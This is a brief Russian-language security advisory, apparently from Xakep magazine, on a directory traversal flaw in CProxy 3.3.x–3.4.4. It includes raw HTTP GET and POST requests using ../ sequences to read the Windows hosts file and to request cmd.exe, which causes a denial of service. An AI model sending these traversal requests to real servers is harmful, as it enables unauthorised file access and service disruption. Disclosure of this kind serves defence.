
Хакер #311. Сетевые протоколы под микроскопом
Программа: CProxy 3.3.x, 3.4 – 3.4.4
Уязвимость позволяет злоумышленнику
просмотреть произвольные файлы на системе
и вызвать отказ в обслуживании. Удаленный
пользователь может с помощью символов
обхода каталога получить доступ к
произвольным данным на системе.
Пример:
GET http://<path-to-target-directory>/<filename> HTTP/1.0<CRLF><CRLF>
GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0
Удаленный пользователь может с помощью GET
запроса запросить ASCII файл и с помощью
любого запроса затребовать исполняемые
файлы и вызвать отказ в обслуживании
приложения.
Примеры:
GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0
GET http://../../../../../winnt/system32/cmd.exe
POST http://../../../../../winnt/system32/cmd.exe